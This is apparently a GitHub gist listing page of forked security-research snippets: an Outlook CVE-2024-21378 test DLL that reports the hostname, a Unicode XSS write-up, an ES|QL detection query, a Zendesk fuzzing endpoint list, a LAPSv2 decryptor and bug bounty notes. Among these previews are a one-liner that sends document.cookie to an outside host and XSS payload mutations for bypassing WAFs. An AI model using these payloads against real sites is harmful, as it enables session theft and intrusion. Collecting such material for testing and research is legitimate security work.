Nuclei Templates
0xSojalSec
/ test_dll.c
Created
April 12, 2024 19:38
— forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
0xSojalSec
/ 1_top+hacker_methodologies.md
Created
January 6, 2024 18:31
— forked from ruevaughn/1_top+hacker_methodologies.md
Hacker Methodologies & Tools (NEW)
0xSojalSec
/ index.md
Created
December 7, 2023 17:44
— forked from paj28/index.md
Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
0xSojalSec
/ ES|QL Masquerading as MS Native DLL
Created
November 9, 2023 19:22
— forked from Samirbous/ES|QL Masquerading as MS Native DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // DLLs normally located in system32 but unsigned and loaded from elsewhere | |
| // https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
| // example ENRICH libs-policy creation steps | |
| https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c | |
| ES|QL query: | |
| from .ds-logs-endpoint.events.library-* | |
| | where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and |
0xSojalSec
/ fetch-call-template.js
Created
August 28, 2023 17:45
— forked from tomnomnom/fetch-call-template.js
Calling fetch to leak cookies with template strings / no parens
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reflect.apply.call`${fetch}${window}${['https://poc.lol/?'+document.cookie]}` |
0xSojalSec
/ CVE-2023-21939.md
Created
August 28, 2023 17:26
— forked from win3zz/CVE-2023-21939.md
CVE-2023-21939 - Code Exec - Proof of Concept
Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
0xSojalSec
/ zendesk_endpoints.txt
Created
July 30, 2023 18:28
— forked from win3zz/zendesk_endpoints.txt
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/v2/accounts | |
| GET /api/v2/activities?since=cstest | |
| GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
| GET /api/v2/automations | |
| POST /api/v2/automations | |
| GET /api/v2/bookmarks | |
| POST /api/v2/bookmarks | |
| GET /api/v2/brands | |
| POST /api/v2/brands | |
| GET /api/v2/custom_objects |
0xSojalSec
/ lapsv2_decryptor.py
Created
May 17, 2023 19:38
— forked from zblurx/lapsv2_decryptor.py
Simple script to extract local admin password in cleartext with LAPSv2 using impacket
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import typing | |
| import math | |
| from uuid import UUID | |
| from pyasn1.codec.der import decoder | |
| from pyasn1_modules import rfc5652 | |
| from struct import unpack | |
| from cryptography import utils | |
| from cryptography.exceptions import AlreadyFinalized, InvalidKey | |
| from cryptography.hazmat.primitives.kdf import KeyDerivationFunction |
0xSojalSec
/ TomNomNom_Q&A_INTIGRITI.txt
Created
February 21, 2023 16:16
— forked from atikrahman1/TomNomNom_Q&A_INTIGRITI.txt
LIVE MENTOR SESSION: @tomnomnom . I have collected all of the the question and answer in comments section for my later read.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INTIGRITI | |
| @intigriti | |
| Red circleLIVE MENTOR SESSION: | |
| @TomNomNom | |
| will answer your #BugBounty and tooling questions for the next 4 hours! Comment with your question! | |
| https://twitter.com/intigriti/status/1258729529859768320 | |
| Question from @amalmurali47 : |
0xSojalSec
/ mutation_a.txt
Created
February 12, 2023 17:19
— forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
NewerOlder